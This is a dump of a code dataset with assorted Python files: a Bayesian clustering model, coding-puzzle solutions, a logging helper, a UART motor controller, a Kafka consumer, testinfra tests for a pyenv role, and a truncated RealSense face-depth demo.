f\"{self.PROTOCOL}{host}:{port}{endpoint}\"\n","sub_path":"src/clients/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"278943440","text":"import gibbs\nimport utils\n\nimport numpy as np\nfrom scipy.misc import logsumexp as lse\nfrom scipy.special import binom as bc #binomial coefficient\nfrom scipy.special import betaln #logarithm of beta function\nfrom scipy.stats import beta\n\nimport random\nimport collections\n\n\nPARAMS_DICT = {\"alpha\":1., \"beta\":1.,\"k\":10.}\nGAMMA = 1. # DP concentration param\n\nclass LanguageModel(object):\n\t\"\"\"\n\tLanguage model required for Language clusters. One for each cluster. \n\tMust have log_likelihood method which determines whether it should return the \n\tprior or posterior marginals for a single new datapoint. \n\tThis version represents a BetaBinomial model where each teacher provides 10 individual \n\tdatapoints and these are seen as exchangable. i.e. we model the sum of their 1s and Ns.\n\tThis assumption is a bit hacky, but it makes the sampling easier and it reflects the idea that\n\tall teachers within a cluster are providing i.i.d. utterances from the same language. 
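# login(), login_with_token() and register() in AuthService above repeat the
# same post -> status-check -> parse sequence; one helper would remove the
# duplication (a sketch; HTTPServiceResponse's constructor is inferred from
# its usage in this record). Note also that User.from_response()'s empty-user
# branch calls User() with no arguments, which raises TypeError because the
# dataclass fields have no defaults.
def _post_and_parse(self, endpoint, payload):
    resp = self.http_conn_pool.post(self._build_url(endpoint), json=payload)
    if resp.status_code in (HTTPStatus.BAD_REQUEST, HTTPStatus.UNAUTHORIZED):
        return HTTPServiceResponse(status=resp.status_code)
    data = resp.json()
    return HTTPServiceResponse({
        "user": User.from_response(data.get("user")),
        "tokens": data.get("tokens", {}),
    })
# login() then reduces to:
#   return self._post_and_parse(self.LOGIN_ENDPOINT, {"email": email, "password": password})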
\n\t\"\"\"\n\tdef __init__(self,datapoints=[], parameters=PARAMS_DICT):\n\t\tfor k, v in parameters.items():\n\t\t\tsetattr(self,k,v)\n\t\tif len(datapoints) != 0:\n\t\t\tself.got_data = True\n\t\t\tself.N, self.y = len(datapoints)*self.k, sum(datapoints)\n\t\telse: self.got_data = False\n\n\tdef increment_counts(self,new_datapoint):\t\t\n\t\tself.N+=10\n\t\tself.y += new_datapoint\n\n\tdef decrement_counts(self,old_datapoint):\n\t\tself.N -= 10\n\t\tself.y -= old_datapoint\n\n\tdef draw_posterior(self):\n\t\tposterior = beta(self.alpha + self.y, self.beta + self.N-self.y)\n\t\tpp_pdf = posterior.pdf(np.linspace(.0001,.9999,1000))\n\t\treturn pp_pdf\n\t\t\n\tdef log_likelihood(self,new_datapoint):\n\t\t\"Return prior/posterior predictive log likelihood, marginalising over p\"\n\n\t\t# no old data: compute prior marginal dist (evidence)\n\t\tif not self.got_data:\n\t\t\talpha, beta = self.alpha, self.beta\n\n\t\t# already assigned data: compute posterior marginal (predictive)\n\t\telse:\n\t\t\talpha, beta = self.alpha + self.y, self.beta + self.N-self.y\n\n\t\tlog_bc_coef = np.log(bc(self.k,new_datapoint))\n\t\ttop = betaln(new_datapoint+alpha,self.k-new_datapoint+beta)\n\t\tbottom = betaln(alpha,beta)\n\t\tlog_p = top-bottom+log_bc_coef\n\t\treturn log_p\n\n\n\n\nclass LanguageClusters(gibbs.Component):\n\n\tdef __init__(self, datapoints):\n\t\tsuper(LanguageClusters, self).__init__('language_clusters')\n\n\t\tself.datapoints = datapoints\n\t\tself.n = len(datapoints)\n\t\tself.cluster_assignments = np.zeros(self.n)\n\t\tself.cluster_counts = collections.defaultdict(int, {0: self.n}) \n\t\tself.models = collections.defaultdict(int, {0: LanguageModel(self.datapoints)})\n\t\tself.empty_model = LanguageModel()\n\n\t@property\n\tdef state(self):\n\t\treturn [self.cluster_assignments, self.models]\n\n\tdef add_model(self, cluster_id,datapoint):\n\t\tassert cluster_id not in self.models\n\n\t\tself.models[cluster_id] = LanguageModel([datapoint])\n\t\t\n\tdef remove_model(self, cluster_id):\n\t\tassert cluster_id in self.models\n\t\t\n\t\tdel self.models[cluster_id] \n\t\t\n\tdef remove_cluster(self, cluster_id):\n\t\tassert cluster_id in self.cluster_counts\n\t\t\n\t\tdel self.cluster_counts[cluster_id]\n\n\tdef log_posteriors_existing_clusters(self,data):\n\t\t# Calculate un-normalised posterior probs for assignment to existing clusters\n\t\texisting_clusters_ids = self.cluster_counts.keys()\n\t\texisting_counts_log = np.log(np.array(self.cluster_counts.values()))\n\t\tcluster_log_likelihoods = np.array([model.log_likelihood(data) for model in self.models.values()])\n\t\tunnormalised_existing_cluster_posterior_log_probs = existing_counts_log+cluster_log_likelihoods\n\t\treturn unnormalised_existing_cluster_posterior_log_probs\n\n\tdef log_posterior_new_cluster(self,data):\n\t\t# Calculate unnormalised log-posterior for a new cluster\n\t\treturn np.log(GAMMA) + self.empty_model.log_likelihood(data)\n\n\tdef full_log_posterior(self,data):\n\t\t#Create a proper log-posterior from improper contributions\n\t\tlog_posterior_tops_existing = self.log_posteriors_existing_clusters(data)\n\t\tlog_posterior_tops_new = self.log_posterior_new_cluster(data)\n\t\tunnormalised_posterior_log_probs = np.append(log_posterior_tops_existing,log_posterior_tops_new)\n\t\tnormalised_posterior_log_probs = unnormalised_posterior_log_probs-lse(unnormalised_posterior_log_probs)\n\t\treturn normalised_posterior_log_probs\n\n\tdef sample_cluster_posterior(self,cluster_id,datapoint):\n\t\tassert cluster_id in 
self.cluster_counts\n\t\tself.cluster_counts[cluster_id] -= 1\n\t\tif self.cluster_counts[cluster_id] == 0:\n\t\t\tself.remove_cluster(cluster_id)\n\t\t\tself.remove_model(cluster_id)\n\n\t\tcluster_posterior = self.full_log_posterior(datapoint)\n\t\tsampled_cluster_index = utils.log_sampler(cluster_posterior).single_sample()\n\t\t\n\t\t# Did we choose a new cluster?\n\t\texisting_clusters_ids = self.cluster_counts.keys()\n\t\tif sampled_cluster_index == len(existing_clusters_ids):\n\t\t\tbiggest_cluster_index = max(existing_clusters_ids)\n\t\t\tnew_cluster_id = biggest_cluster_index + 1\n\t\t\tself.add_model(new_cluster_id,datapoint)\n\t\telse:\n\t\t\t# Did we choose an existing cluster?\n\t\t\tnew_cluster_id = existing_clusters_ids[sampled_cluster_index]\n\t\tself.cluster_counts[new_cluster_id] += 1\n\t\treturn new_cluster_id\n\n\tdef update_clusters(self,old_cluster_index,datapoint_index):\n\t\tdatapoint = self.datapoints[datapoint_index]\n\t\tsampled_cluster = self.sample_cluster_posterior(old_cluster_index, datapoint)\n\t\tself.cluster_assignments[datapoint_index] = sampled_cluster\n\t\treturn sampled_cluster\n\n\tdef update_models(self,old_cluster_index,new_cluster_index,datapoint_index):\n\t\tdatapoint = self.datapoints[datapoint_index]\n\t\tif old_cluster_index in self.models:\n\t\t\tself.models[old_cluster_index].decrement_counts(datapoint)\n\t\tself.models[new_cluster_index].increment_counts(datapoint)\n\n\tdef sample(self,components):\n\t\tfor i in xrange(self.n-1):\n\t\t\told_cluster_index = self.cluster_assignments[i]\n\t\t\tnew_cluster_index = self.update_clusters(old_cluster_index,i)\n\t\t\tself.update_models(old_cluster_index,new_cluster_index,i)","sub_path":"src/agent_bb.py","file_name":"agent_bb.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216149567","text":"# https://www.jiuzhang.com/solutions/binary-tree-longest-consecutive-sequence#tag-highlight-lang-python\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestConsecutive(self, root: TreeNode) -> int:\n def _helper(root, parent, total):\n if not root:\n return total\n\n if parent and root.val == parent.val + 1:\n total += 1\n else:\n total = 1\n\n left = _helper(root.left, root, total)\n right = _helper(root.right, root, total)\n\n return max(total, max(left, right))\n\n return _helper(root, None, 0)\n","sub_path":"leetcode/lc298_Binary_Tree_Longest_Consecutive_Sequence.py","file_name":"lc298_Binary_Tree_Longest_Consecutive_Sequence.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"517166553","text":"import logging # 所以不能以logging为文件名(自己的文件命名不能和引入的模块名冲突)\n\nclass MyLog:\n '''自己写的日之类'''\n\n def my_log(self,level, msg):\n # 收集器 -----创建一个日志收集器\n my_logger = logging.getLogger('python13')\n # getLogger 是个函数,必须传一个参数,作为自己的日志收集器的名字,否则还是会用root logger\n my_logger.setLevel('DEBUG') # 给日志收集器设置level (相当于第一次过滤)\n\n # 输出格式 Formatter 是个类 规定日志输出的格式\n formatter = logging.Formatter('%(asctime)s-[%(levelname)s]-[%(lineno)d]-[日志信息]:%(message)s')\n\n # 输出渠道 -----指定输出渠道\n ch = logging.StreamHandler() # 创建一个输出到控制台的渠道\n ch.setLevel('INFO') # 给自己设置的渠道设置level (相当于第二次过滤)\n ch.setFormatter(formatter)\n\n # 输出渠道 -----输出到指定文件 文件路径 绝对路径和相对路径都可以\n fh = logging.FileHandler('huahua.log',encoding='utf-8') # 指定参数,默认a模式。有文件,追加。没文件,新建\n 
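# agent_bb.py above imports logsumexp from scipy.misc, which was deprecated
# and later removed; scipy.special.logsumexp is the current home. (The file is
# also Python 2 -- note xrange in sample().) The log-space normalisation done
# in full_log_posterior(), in isolation:
import numpy as np
from scipy.special import logsumexp

log_tops = np.array([-3.2, -1.1, -7.8])     # unnormalised log posteriors
log_post = log_tops - logsumexp(log_tops)   # subtract the log partition sum
assert np.isclose(np.exp(log_post).sum(), 1.0)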
fh.setLevel('DEBUG')\n fh.setFormatter(formatter)\n\n # 对接 日志收集器和输出渠道进行对接\n my_logger.addHandler(ch)\n my_logger.addHandler(fh)\n\n if level == 'DEBUG':\n my_logger.debug(msg) # 用自己的日志收集器去收集(logging调用的是root级别的)\n elif level == 'INFO':\n my_logger.info(msg)\n elif level == 'WARNING':\n my_logger.warning(msg)\n elif level == 'ERROR':\n my_logger.error(msg)\n else:\n my_logger.critical(msg)\n\n # 删除收集器 ,防止信息重复输出\n my_logger.removeHandler(ch)\n my_logger.removeHandler(fh)\n\n def debug(self, msg):\n self.my_log('DEBUG', msg)\n\n def info(self, msg):\n self.my_log('INFO', msg)\n\n def warning(self, msg):\n self.my_log('WARNING', msg)\n\n def error(self, msg):\n self.my_log('ERROR', msg)\n\n def critical(self, msg):\n self.my_log('CRITICAL', msg)\n\nif __name__ == '__main__':\n my_loger = MyLog()\n my_loger.error('99999999999999999')\n my_loger.info('6666666666666666666')","sub_path":"test/zgh/unittest_test/course_0105/my_log.py","file_name":"my_log.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148280041","text":"from collections import *\nimport sys\nsys.setrecursionlimit(10**6)\n\nH, W = map(int, input().split())\nmas = []\nfor i in range(H):\n mas.append(input())\n \ncolor = []\nfor i in range(H):\n color.append([-1] * W)\n\ndef DFS(node, c_color):\n x = node[0]\n y = node[1]\n nb = [[x, y-1], [x, y+1], [x+1, y], [x-1, y]]\n deq = deque()\n for i in range(4):\n if(nb[i][0] >= 0 and nb[i][0] < H and nb[i][1] >= 0 and nb[i][1] < W):\n if(color[nb[i][0]][nb[i][1]] == -1):\n deq.append(nb[i])\n deq_ = deque()\n while(deq):\n next_node = deq.popleft()\n if(mas[next_node[0]][next_node[1]] != mas[node[0]][node[1]]):\n color[next_node[0]][next_node[1]] = c_color\n deq_.append(next_node) \n while(deq_):\n next_node = deq_.popleft()\n DFS(next_node, c_color)\n return\n \ncurrent_color = 0\nfor i in range(H):\n for j in range(W):\n if(color[i][j] >= 0):\n continue\n else:\n color[i][j] = current_color\n DFS([i, j], current_color)\n current_color += 1\n\ncolor_num = []\nfor i in range(current_color):\n color_num.append([0, 0])\nfor i in range(H):\n for j in range(W):\n if(mas[i][j] == '#'):\n color_num[color[i][j]][0] += 1\n else:\n color_num[color[i][j]][1] += 1\n\nans = 0\nfor i in range(len(color_num)):\n ans += color_num[i][0] * color_num[i][1]\nprint(ans)\n","sub_path":"Python_codes/p03157/s907360209.py","file_name":"s907360209.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239137704","text":"# Program to perform arithematic operators\n\ncontinu = 'y'\nwhile continu == 'y':\n\tnumber_1 = int(input(\"Enter a number: \"))\n\tnumber_2 = int(input(\"Enter another number: \"))\n\toperation = input(\"Enter the operation to perform 1) Addition(+) , 2) Subtraction, 3) Multiplication, 4) Division: \")\n\tif operation == '+' or '1':\n\t\tsum = number_1 + number_2\n\t\tprint(f\"The Addition of {number_1} and {number_2} is {sum}\")\n\telif operation == '-' or '2':\n\t\tdifference = number_1 - number_2\n\t\tprint(f\"The Subtraction of {number_1} and {number_2} is {difference}\")\n\telif operation == '*' or '3':\n\t\tmul = number_1*number_2\n\t\tprint(f\"The Multiplication of {number_1} and {number_2} is {mul}\")\n\telse:\n\t\tdiv = number_1 / number_2\n\t\tprint(f\"The Division of {number_1} and {number_2} is {div}\")\n\tcontinu = input(\"Do you want to continue 
[y/n]\")\n","sub_path":"Arithmetic_operators.py","file_name":"Arithmetic_operators.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"630017320","text":"#!/usr/bin/env python\n# coding=utf8\n\"\"\"\nhttps://leetcode.com//problems/container-with-most-water/\n\nac_rate:\t32.0%\ndifficulty:\tMedium\n\n\nGiven n non-negative integers a1, a2, ..., an, where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0). Find two lines, which together with x-axis forms a container, such that the container contains the most water.\nNote: You may not slant the container.\n\nShow Tags:\tArray, Two Pointers\n\"\"\"\n\n\n\nclass Solution0(object):\n def maxArea(self, height):\n \"\"\"\n Time Limit Exceeded\n\n :type height: List[int]\n :rtype: int\n \"\"\"\n max_area = 0\n size = len(height)\n for i in xrange(size):\n for j in xrange(i+1, size):\n area = (j - i) * min(height[i], height[j])\n if area > max_area:\n max_area = area\n return max_area\n\n\nclass Solution(object):\n def maxArea(self, height):\n start = 0\n end = len(height) - 1\n max_area = 0\n while start < end:\n area = (end - start) * min(height[start], height[end])\n if area > max_area:\n max_area = area\n if height[start] <= height[end]:\n start += 1\n else:\n end -= 1\n return max_area\n\n","sub_path":"leetcode/finished/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534238013","text":"#\n# author: Michal Kostrzewa\n# kostrzewa.michal@o2.pl\n#\n# Module for comms with motor controller via UART\n#\n\nimport serial, time, struct, datetime\n\nimport procComms\n\non = False\n\nuart = None\nbaudrate = 2400\noutputTimeout = 0.2 # sends msgs to uC not faster than every this period. Otherwise there are \n# problems with output (messages \"queue\" up faster than they're sent and it creates a huuuge delay \n# in motor response)\n\nlastSent = 0\nlastUpdate = 0\n\nleftVar = 0.0\nrightVar = 0.0\nleftSP = 0.0\nrightSP = 0.0\n\n# for translating -1, 1 to 0,255\nminVar = 40 # start with 40 because less doesn't move the motor\nmaxVar = 220\n\nvarThreshold = 0.01\n\n# ramp time in seconds for SP change from 0 to 1\n# note that for manual control, radio signal averaging will add additional\n# delay in response time - oh well this is good enough. \nrampTime = 1.0 \nrampRate = 1.0 / rampTime\n\n# initializes comms\ndef Init():\n\tglobal uart, on\n\n\tuart = serial.Serial(\"/dev/ttyAMA0\", baudrate)\n\n\tuart.byteize = serial.EIGHTBITS\n\tuart.parity = serial.PARITY_NONE\n\tuart.stopbits = serial.STOPBITS_TWO\n\n\tif uart.inWaiting() > 0:\n\t\tuart.flushInput()\n\tuart.timeout = 1\n\n\tlastSent = 0.0\n\tlastUpdate = 0.0\n\n\ton = True\n\n\tprocComms.PrintLog('Initialized motor control.')\n\n\n# turns motors off\ndef Stop():\n\tglobal on, leftVar, rightVar\n\t# wait for empty output and stop each motor\n\tleftVar = 0.0\n\trightVar = 0.0\n\twhile SendMsg() == 1: pass\n\ton = False\n\tprocComms.PrintLog('Stopped motor control.')\n\n\n# updates actual motor setpoints based (why? 
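# In Arithmetic_operators.py above, `if operation == '+' or '1':` is always
# true: Python parses it as (operation == '+') or ('1'), and the non-empty
# string '1' is truthy, so every input takes the addition branch (the '-' and
# '*' branches have the same bug). A corrected dispatch sketch:
def calculate(operation, a, b):
    """Dispatch on either the operator symbol or the menu number."""
    if operation in ('+', '1'):
        return a + b
    if operation in ('-', '2'):
        return a - b
    if operation in ('*', '3'):
        return a * b
    return a / b  # anything else divides, as in the original

assert calculate('2', 7, 4) == 3  # the subtraction branch is now reachable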
applies ramp time)\ndef Update():\n\tglobal leftVar, rightVar, lastUpdate\n\n\tcurrTime = time.time()\n\tdeltaT = currTime - lastUpdate\n\tlastUpdate = currTime\n\n\t# if processor lags or at startup, stop the change\n\tif deltaT > 1.0: deltaT = 0.0\n\n\t# ramp 'direction'\n\tleftSign = 1.0\n\tif leftVar > leftSP:\n\t\tleftSign = -1.0\n\trightSign = 1.0\n\tif rightVar > rightSP:\n\t\trightSign = -1.0\n\n\tdeltaLeft = leftSign * rampRate * deltaT\n\tdeltaRight = rightSign * rampRate * deltaT\n\n\tif leftSP == 0.0 and abs(leftVar) - abs(deltaLeft) < 0.0: \n\t\tleftVar = 0.0\n\telse:\n\t\tleftVar = leftVar + deltaLeft\n\t\tif leftSP > 0.0 and leftVar >= leftSP: leftVar = leftSP\n\t\telif leftSP < 0.0 and leftVar < leftSP: leftVar = leftSP\n\n\tif rightSP == 0.0 and abs(rightVar) - abs(deltaRight) < 0.0: \n\t\trightVar = 0.0\n\telse:\n\t\trightVar = rightVar + deltaRight\n\t\tif rightSP > 0.0 and rightVar >= rightSP: rightVar = rightSP\n\t\telif rightSP < 0.0 and rightVar < rightSP: rightVar = rightSP\n\n\tSendMsg()\n\n\n# sets setpoints for both motors\ndef SetSP(leftSetpoint, rightSetpoint):\n\tglobal leftSP, rightSP\n\n\tleftSP = leftSetpoint\n\trightSP = rightSetpoint\n\n\tif leftSP < -1.0: leftSP = -1.0\n\telif leftSP > 1.0: leftSP = 1.0\n\tif rightSP < -1.0: rightSP = -1.0\n\telif rightSP > 1.0: rightSP = 1.0\n\n\n# sends messages to uC if ready\ndef SendMsg():\n\tglobal uart, lastSent\n\n\tif not on: return 4\n\n\t# don't send a message if the last one wasn't sent out yet\n\tcurrTime = time.time()\n\tif currTime - lastSent < outputTimeout:\n\t\treturn 1\n\telse:\n\t\tlastSent = currTime\n\n\tif uart is None:\n\t\tprocComms.PrintLog('Motor control not initialized!')\n\t\treturn 3\n\n\tvars = [leftVar, rightVar]\n#\tprocComms.PrintLog((leftVar, rightVar))\n\tdummy = '00'\n\tdata = struct.pack('!B', int(dummy, 16))\n\tsync = 'FF'\n\tfor i in range(2):\n\n\t\tdata += struct.pack('!B', int(dummy, 16))\n\n\t\tif vars[i] < -1 or vars[i] > 1:\n\t\t\tprocComms.PrintLog('Motor variable value out of range.')\n\t\t\treturn 2\n\n\t\t# pretty simple message protocol, frame is 2 bytes: 0xFFXYVV\n\t\t# 0xFF - sync byte\n\t\t# X={A,B} - motor ID\n\t\t# Y={0,1,2} - 0 - forward, 1 - backward, 2 - stop\n\t\t# VV={0-255} - value\n\t\t# notes: \n\t\t# - when issuing stop, value will be ignored but MUST be sent\n\t\t# - value directly corresponds to PWM output. 
Motor won't respond to small \n\t\t# values so a minimal value of PWM must be specified.\n\n\t\tcmd = ''\n\t\targ = 0\n\n\t\tif i == 0:\n\t\t\tcmd = 'A'\n\t\telif i == 1:\n\t\t\tcmd = 'B'\n\n\t\tif vars[i] == 0.0:\n\t\t\tcmd += '2'\n\t\telif vars[i] > 0.0:\n\t\t\tcmd += '0'\n\t\t\targ = int(minVar + (maxVar - minVar) * vars[i])\n\t\telif vars[i] < 0.0:\n\t\t\tcmd += '1'\n\t\t\targ = int(minVar + (maxVar - minVar) * -(vars[i]))\n\t\n\t\tdata += struct.pack('!B', int(sync, 16))\n\t\tdata += struct.pack('!B', int(cmd, 16))\n\t\tdata += struct.pack('!B', arg)\n\n#\tprocComms.PrintDebug('Sent to uC: ' + data.encode(\"hex\"))\n\tuart.write(data)\n\treturn 0\n","sub_path":"motorControl.py","file_name":"motorControl.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"101452273","text":"from pykafka import KafkaClient\nimport json\n\nclient = KafkaClient(hosts=\"127.0.0.1:9092\")\ntopic = client.topics[\"twitter.ai.test\"]\nconsumer = topic.get_simple_consumer()\n\nfor message in consumer:\n if message is not None:\n tweet = json.loads(message.value)\n print(tweet[\"text\"])\n","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"246496569","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n\ns = input()\n\nnumber = ['ABC', 'DEF', 'GHI', 'JKL', 'MNO', 'PQRS', 'TUV', 'WXYZ']\n\nresult = 0\n\nfor x in s:\n for y in number:\n if x in y:\n result += number.index(y) + 3\n\nprint(result)\n","sub_path":"5622.py","file_name":"5622.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10764002","text":"# coding: utf-8\n# flake8: noqa\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport os\nimport pytest\nimport testinfra.utils.ansible_runner\n\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef assert_pip_package_version_is_installed(packages, expected_pkg_name, expected_version):\n \"\"\"Expect host.pip_package(expected_pkg_name).version == expected_version\n\n \"\"\"\n\n assert expected_pkg_name in packages, 'The PIP package `{}` is not installed'.format(expected_pkg_name)\n pkg = packages[expected_pkg_name]\n\n err_msg = 'Expected package `{}` version == `{}`, got `{}`'.format(expected_pkg_name, expected_version, pkg['version'])\n\n if expected_version:\n assert pkg['version'] == expected_version, err_msg\n\n\n@pytest.mark.parametrize(\n 'required_package, what_package_install_should_be',\n (\n pytest.param('autoconf', True),\n pytest.param('centos-release-scl', True),\n pytest.param('ctags', True),\n pytest.param('expat-devel', True),\n pytest.param('gcc', True),\n pytest.param('gcc-c++', True),\n pytest.param('gdbm-devel', True),\n pytest.param('git', True),\n pytest.param('kernel-devel', True),\n pytest.param('libffi-devel', True),\n pytest.param('libpcap-devel', True),\n pytest.param('make', True),\n pytest.param('ncurses-devel', True),\n pytest.param('patchutils', True),\n pytest.param('pkgconfig', True),\n pytest.param('openssl-devel', True),\n pytest.param('python-devel', True),\n pytest.param('readline-devel', True),\n pytest.param('sqlite-devel', True),\n pytest.param('sqlite2-devel', True),\n pytest.param('tk-devel', True),\n 
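# motorControl.py above frames each command as a 0xFF sync byte, a command
# byte (motor nibble 0xA/0xB plus direction nibble 0/1/2) and a value byte.
# A decoder mirroring that layout -- only the encoder exists in the record,
# so this is an illustrative sketch:
import struct

def decode_motor_frame(frame):
    """Unpack sync/cmd/value; raise ValueError on a bad sync byte."""
    sync, cmd, value = struct.unpack('!BBB', frame)
    if sync != 0xFF:
        raise ValueError('missing 0xFF sync byte')
    motor = 'A' if (cmd >> 4) == 0xA else 'B'
    direction = {0: 'forward', 1: 'backward', 2: 'stop'}[cmd & 0x0F]
    return motor, direction, value

assert decode_motor_frame(b'\xff\xa0\x7f') == ('A', 'forward', 127)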
pytest.param('zlib-devel', True),\n pytest.param('python-setuptools', True),\n pytest.param('epel-release', True),\n pytest.param('bzip2-devel', True),\n ),\n)\ndef test_required_package_is_installed(host, required_package, what_package_install_should_be):\n package = host.package(required_package)\n\n assert package.is_installed is what_package_install_should_be\n\n\ndef test_db4_devel_is_installed_on_centos_6(host):\n if host.system_info.release.split('.')[0] != '6':\n pytest.skip('skipping test because we are not CentOS 6.x')\n\n pkg = host.package('db4-devel')\n\n assert pkg.is_installed\n\n\ndef test_db4_devel_is_installed_on_centos_7(host):\n if host.system_info.release.split('.')[0] != '7':\n pytest.skip('skipping test because we are not CentOS 7.x')\n\n pkg = host.package('libdb4-devel')\n\n assert pkg.is_installed\n\n\ndef test_pyenv_root_dir_exists(host):\n opt_pyenv = host.file('/opt/pyenv')\n\n assert opt_pyenv.exists\n assert opt_pyenv.is_directory\n assert opt_pyenv.user == 'root'\n assert opt_pyenv.group == 'root'\n\n\ndef test_etc_profile_dot_d_pyenv_dot_sh_exists(host):\n etc_profiled_pyenv_sh = host.file('/etc/profile.d/pyenv.sh')\n\n expected_content = '''export PYENV_ROOT=\"${PYENV_ROOT:-/opt/pyenv}\"\nexport PATH=\"${PYENV_ROOT}/bin:${PATH}\"\neval \"$(pyenv init -)\"\n[ -d \"${PYENV_ROOT}/plugins/pyenv-virtualenv\" ] && eval \"$(pyenv virtualenv-init -)\"\n'''\n\n assert etc_profiled_pyenv_sh.exists\n assert etc_profiled_pyenv_sh.is_file\n assert etc_profiled_pyenv_sh.user == 'root'\n assert etc_profiled_pyenv_sh.user == 'root'\n assert etc_profiled_pyenv_sh.mode== 0o0644\n assert etc_profiled_pyenv_sh.content_string.strip() == expected_content.strip()\n\n\n@pytest.mark.parametrize(\n 'version',\n (\n pytest.param('2.6.9'),\n pytest.param('2.7.15'),\n pytest.param('3.6.6'),\n ),\n)\ndef test_opt_python_version_dir_exists(host, version):\n directory = host.file('/opt/python/{version}'.format(version=version))\n\n assert directory.exists\n assert directory.is_directory\n assert directory.user == 'root'\n assert directory.group == 'root'\n assert directory.mode == 0o0755\n\n python_version_file = host.file('/opt/python/{version}/.python-version'.format(version=version))\n\n assert python_version_file.exists\n assert python_version_file.is_file\n assert python_version_file.user == 'root'\n assert python_version_file.group == 'root'\n assert python_version_file.mode== 0o0644\n\n\ndef test_python269_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/2.6.9/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pyOpenSSL', expected_version='17.5.0'),\n dict(expected_pkg_name='pip', expected_version='9.0.3'),\n dict(expected_pkg_name='ndg-httpsclient', expected_version='0.5.0'),\n dict(expected_pkg_name='pyasn1', expected_version=None),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\ndef test_python2715_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/2.7.15/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pip', expected_version='10.0.1'),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', 
expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\ndef test_python366_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/3.6.6/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pip', expected_version='10.0.1'),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\n@pytest.mark.parametrize(\n 'plugin',\n (\n pytest.param('pyenv-virtualenv'),\n ),\n)\ndef test_activated_plugins_are_installed(host, plugin):\n path = host.file('/opt/pyenv/plugins/' + plugin)\n\n assert path.exists\n assert path.is_directory\n assert path.user == 'root'\n assert path.group == 'root'\n assert path.mode == 0o0755\n","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257685018","text":"import sys\nimport argparse\nimport cv2\nimport numpy as np\n\n#Parse arguments and load additional modules\nparser = argparse.ArgumentParser(description = 'Luna SDK realsense depth demo')\ngroup = parser.add_argument_group('Required arguments')\ngroup.add_argument('--data', required = True, help = 'absolute path to Luna SDK data directory')\ngroup.add_argument('--bindPath', required = True, help = 'absolute path to Luna SDK bindings directory')\ngroup.add_argument('--rsbindPath', required = True, help = 'absolute path to realsense bindings directory')\nargs = parser.parse_args()\nprint(\"Arguments are: data: {} bindPath: {} rsbindPath: {}\".format(args.data, args.bindPath, args.rsbindPath))\n\nsys.path += (args.bindPath, args.rsbindPath)\nimport FaceEngine as fe\nimport pyrealsense2 as rs\n\nif __name__ == \"__main__\":\n\t#create Face Engine root object\n\troot = fe.createFaceEngine(args.data)\n\t#check license\n\tlicense = root.getLicense()\n\tif not root.activateLicense(license, args.data + \"/license.conf\"):\n\t\tprint(\"Failed to activate license!\")\n\t\texit(-1)\n\t\n\tdetector = root.createDetector(fe.FACE_DET_V1)\n\testimator = root.createDepthEstimator()\n\twarper = root.createWarper()\n\t\n\t# Configure streams and start the pipeline\n\tpipe = rs.pipeline()\n\tpipeProfile = pipe.start()\n\n\tdevice = pipeProfile.get_device()\n\tprint(device)\n\n\t# Since realsense depth sensors contain pixel values in 